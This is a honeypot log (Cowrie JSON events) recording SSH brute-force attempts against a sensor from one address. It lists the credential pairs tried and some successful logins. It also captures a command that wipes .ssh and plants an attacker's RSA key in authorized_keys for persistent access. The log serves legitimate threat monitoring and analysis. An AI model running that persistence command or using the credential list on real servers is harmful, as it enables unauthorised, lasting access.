{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:49:18.576550Z","src_ip":"212.227.235.229","session":"446017e9960b"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:49:18.663270Z","src_ip":"212.227.235.229","session":"d0f983348597"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:49:19.648952Z","src_ip":"212.227.235.229","session":"6a7d0fb6a449"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:49:19.923104Z","src_ip":"212.227.235.229","session":"6a7d0fb6a449"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:49:19.926307Z","src_ip":"212.227.235.229","session":"6e92b6a75f5e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:49:20.816368Z","src_ip":"212.227.235.229","session":"446017e9960b"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:49:21.049849Z","src_ip":"212.227.235.229","session":"446017e9960b"}
{"eventid":"cowrie.session.closed","duration":"18.5","message":"Connection lost after 18.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:49:21.993497Z","src_ip":"212.227.235.229","session":"26eb429420c0"}
{"eventid":"cowrie.session.connect","src_ip":"183.106.44.159","src_port":59231,"dst_ip":"1.2.3.4","dst_port":23,"session":"f44fa118b074","protocol":"telnet","message":"New connection: 183.106.44.159:59231 (1.2.3.4:23) [session: f44fa118b074]","sensor":"my-vps","timestamp":"2025-09-09T01:49:29.743779Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:49:35.217647Z","src_ip":"212.227.235.229","session":"83d39e960ee0"}
{"eventid":"cowrie.session.closed","duration":180.25340580940247,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:49:35.222678Z","src_ip":"212.227.235.229","session":"83d39e960ee0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52862,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d615411b264","protocol":"ssh","message":"New connection: 212.227.235.229:52862 (1.2.3.4:22) [session: 3d615411b264]","sensor":"my-vps","timestamp":"2025-09-09T01:49:44.932092Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:49:44.933101Z","src_ip":"212.227.235.229","session":"3d615411b264"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:49:45.179134Z","src_ip":"212.227.235.229","session":"3d615411b264"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"111111","message":"login attempt [nginx/111111] failed","sensor":"my-vps","timestamp":"2025-09-09T01:49:46.158280Z","src_ip":"212.227.235.229","session":"3d615411b264"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48606,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c511e1b1513","protocol":"ssh","message":"New connection: 212.227.235.229:48606 (1.2.3.4:22) [session: 5c511e1b1513]","sensor":"my-vps","timestamp":"2025-09-09T01:49:46.623118Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:49:46.623762Z","src_ip":"212.227.235.229","session":"5c511e1b1513"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:49:46.867223Z","src_ip":"212.227.235.229","session":"5c511e1b1513"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:49:47.404843Z","src_ip":"212.227.235.229","session":"3d615411b264"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"P@ssword123","message":"login attempt [deploy/P@ssword123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:49:47.875604Z","src_ip":"212.227.235.229","session":"5c511e1b1513"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:49:49.119252Z","src_ip":"212.227.235.229","session":"5c511e1b1513"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46472,"dst_ip":"1.2.3.4","dst_port":22,"session":"8dffcef63961","protocol":"ssh","message":"New connection: 212.227.235.229:46472 (1.2.3.4:22) [session: 8dffcef63961]","sensor":"my-vps","timestamp":"2025-09-09T01:49:55.210595Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:49:55.211585Z","src_ip":"212.227.235.229","session":"8dffcef63961"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:49:55.458143Z","src_ip":"212.227.235.229","session":"8dffcef63961"}
{"eventid":"cowrie.login.failed","username":"test","password":"111111","message":"login attempt [test/111111] failed","sensor":"my-vps","timestamp":"2025-09-09T01:49:56.483943Z","src_ip":"212.227.235.229","session":"8dffcef63961"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:49:57.733485Z","src_ip":"212.227.235.229","session":"8dffcef63961"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52798,"dst_ip":"1.2.3.4","dst_port":22,"session":"2dc28607655a","protocol":"ssh","message":"New connection: 212.227.235.229:52798 (1.2.3.4:22) [session: 2dc28607655a]","sensor":"my-vps","timestamp":"2025-09-09T01:50:28.943831Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:50:28.944810Z","src_ip":"212.227.235.229","session":"2dc28607655a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:50:29.204888Z","src_ip":"212.227.235.229","session":"2dc28607655a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123qweASD","message":"login attempt [admin/123qweASD] failed","sensor":"my-vps","timestamp":"2025-09-09T01:50:30.285245Z","src_ip":"212.227.235.229","session":"2dc28607655a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38632,"dst_ip":"1.2.3.4","dst_port":22,"session":"44e977926382","protocol":"ssh","message":"New connection: 212.227.235.229:38632 (1.2.3.4:22) [session: 44e977926382]","sensor":"my-vps","timestamp":"2025-09-09T01:50:30.980004Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:50:30.981989Z","src_ip":"212.227.235.229","session":"44e977926382"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:50:31.244434Z","src_ip":"212.227.235.229","session":"44e977926382"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:50:31.546933Z","src_ip":"212.227.235.229","session":"2dc28607655a"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@Password","message":"login attempt [root/Admin@Password] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:50:32.332842Z","src_ip":"212.227.235.229","session":"44e977926382"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:50:32.943263Z","src_ip":"212.227.235.229","session":"44e977926382"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:50:32.944387Z","src_ip":"212.227.235.229","session":"44e977926382"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:50:32.945230Z","src_ip":"212.227.235.229","session":"44e977926382"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:50:33.208010Z","src_ip":"212.227.235.229","session":"44e977926382"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53537,"dst_ip":"1.2.3.4","dst_port":22,"session":"23003b866e1b","protocol":"ssh","message":"New connection: 212.227.235.229:53537 (1.2.3.4:22) [session: 23003b866e1b]","sensor":"my-vps","timestamp":"2025-09-09T01:50:33.611892Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:50:33.612711Z","src_ip":"212.227.235.229","session":"23003b866e1b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:50:33.748959Z","src_ip":"212.227.235.229","session":"44e977926382"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:50:33.749648Z","src_ip":"212.227.235.229","session":"44e977926382"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:50:33.843606Z","src_ip":"212.227.235.229","session":"23003b866e1b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:50:34.014251Z","src_ip":"212.227.235.229","session":"44e977926382"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:50:34.015258Z","src_ip":"212.227.235.229","session":"44e977926382"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34334,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8c90f0a14d9","protocol":"ssh","message":"New connection: 212.227.235.229:34334 (1.2.3.4:22) [session: b8c90f0a14d9]","sensor":"my-vps","timestamp":"2025-09-09T01:50:34.272856Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:50:34.273859Z","src_ip":"212.227.235.229","session":"b8c90f0a14d9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:50:34.533952Z","src_ip":"212.227.235.229","session":"b8c90f0a14d9"}
{"eventid":"cowrie.login.failed","username":"hunter","password":"Password123","message":"login attempt [hunter/Password123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:50:34.809620Z","src_ip":"212.227.235.229","session":"23003b866e1b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:50:35.610977Z","src_ip":"212.227.235.229","session":"b8c90f0a14d9"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:50:36.042415Z","src_ip":"212.227.235.229","session":"23003b866e1b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60628,"dst_ip":"1.2.3.4","dst_port":22,"session":"72687dba6d9c","protocol":"ssh","message":"New connection: 212.227.235.229:60628 (1.2.3.4:22) [session: 72687dba6d9c]","sensor":"my-vps","timestamp":"2025-09-09T01:50:36.398806Z"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:50:36.872680Z","src_ip":"212.227.235.229","session":"b8c90f0a14d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34344,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffed22705758","protocol":"ssh","message":"New connection: 212.227.235.229:34344 (1.2.3.4:22) [session: ffed22705758]","sensor":"my-vps","timestamp":"2025-09-09T01:50:37.132524Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:50:37.133436Z","src_ip":"212.227.235.229","session":"ffed22705758"}
